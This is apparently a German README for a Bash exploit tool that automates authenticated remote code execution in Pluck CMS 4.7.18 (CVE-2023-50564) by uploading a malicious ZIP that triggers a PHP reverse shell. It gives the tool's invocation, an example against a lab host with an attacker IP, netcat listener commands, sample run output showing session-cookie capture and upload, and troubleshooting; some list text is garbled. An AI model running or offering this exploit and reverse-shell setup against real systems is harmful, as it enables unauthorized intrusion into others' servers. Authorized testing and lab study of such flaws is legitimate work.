
Bash-Exploit, das authentifizierte Remote-Codeausführung in Pluck CMS 4.7.18 über einen bösartigen ZIP-Upload automatisiert und eine PHP-Reverse-Shell für CVE-2023-50564 auslöst.
Dieses Skript nutzt eine Remote Code Execution (RCE)-Sicherheitslücke in Pluck CMS v4.7.18 aus. Die Schwachstelle erlaubt es einem Angreifer, eine schadhafte PHP-Datei auf den Server hochzuladen und auszuführen, wodurch er entfernte Befehlsausführung auf dem Zielsystem erlangt.
Das Skript automatisiert den gesamten Prozess durch:
Hinweis: Das Skript benötigt einen Netcat-Listener auf dem Rechner des Angreifers, um die Reverse-Shell zu empfangen.
Bevor Sie das Skript ausführen, stellen Sie sicher, dass Folgendes vorhanden ist:
./CVE-2023-50564 -h <host> -P <password> -i <IP> -p <port>
-h <host>: Der Zielhost (z. B. greenhorn.htb).-P <password>: Das Passwort für das Admin-Panel von Pluck CMS (z. B. abcd123).-i <IP>: Die IP-Adresse des Angreifers, an die die Reverse-Shell gesendet wird.-p <port>: Der Port, auf dem der Netcat-Listener läuft, um die Reverse-Shell zu empfangen../CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
Netcat-Listener einrichten: Starten Sie auf dem Rechner des Angreifers einen Netcat-Listener auf dem angegebenen Port:
nc -nvlp <port>
Zum Beispiel:
nc -nvlp 9001
Skript ausführen: Geben Sie dem Skript die erforderlichen Parameter wie Host, Passwort, IP-Adresse und Port an.
./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
Skriptausführung:
love.php) enthält."RCE is waiting for you, please go take a look.", und das Skript beendet sich, nachdem es die benötigte Zeit erfasst hat.Auf das Ziel zugreifen: Sobald die Reverse-Shell ausgelöst wird, erscheint die Verbindung in Ihrem Netcat-Listener, der Ihnen entfernten Zugriff auf das Zielsystem gewährt.
image
./CVE-2023-50564 -h greenhorn.htb -P ********* -i 10.10.16.7 -p 9001
Netcat listener detected on port 9001.
Downloading reverse shell PHP exploit...
updating: love.php (deflated 60%)
Exploit zipped as loverce.zip and original PHP file removed.
Extracted Cookie: PHPSESSID=somecookievalue
Login successful!
ZIP file uploaded successfully.
RCE is waiting for you, please go take a look.
Script terminated. Total time taken: 70 seconds.
Sie können curl und netcat mit den folgenden Befehlen installieren, falls sie nicht vorhanden sind:
sudo apt update
sudo apt install curl netcat
sudo yum install curl nc
Dieses Skript ist ausschließlich für Bildungs- und autorisierte Penetrationstest-Zwecke bestimmt. Die unbefugte Nutzung dieses Skripts ist illegal und unethisch. Holen Sie stets eine ordnungsgemäße Genehmigung ein, bevor Sie eine Sicherheitslücke auf einem System ausnutzen.
504 Gateway Time-out: Das Skript könnte diesen Fehler beim Versuch, die Reverse-Shell auszuführen, erhalten. Dies beeinträchtigt jedoch nicht den Erfolg der Shell-Ausführung. Der Fehler tritt normalerweise auf, weil der Zielserver zu lange braucht, um auf die HTTP-Anfrage zu antworten, die Shell sollte dennoch funktionieren.
Netcat-Listener-Probleme: Falls Sie keine Reverse-Shell erhalten, stellen Sie sicher, dass Ihre IP-Adresse und Ihr Port korrekt eingestellt sind und dass keine Firewall-Einschränkungen verhindern, dass das Ziel eine Verbindung zu Ihrem Rechner herstellt.
Skript kann sich nicht anmelden: Falls die Anmeldung am CMS-Admin-Panel fehlschlägt, überprüfen Sie das angegebene Passwort und stellen Sie sicher, dass das CMS auf dem Zielsystem erreichbar ist.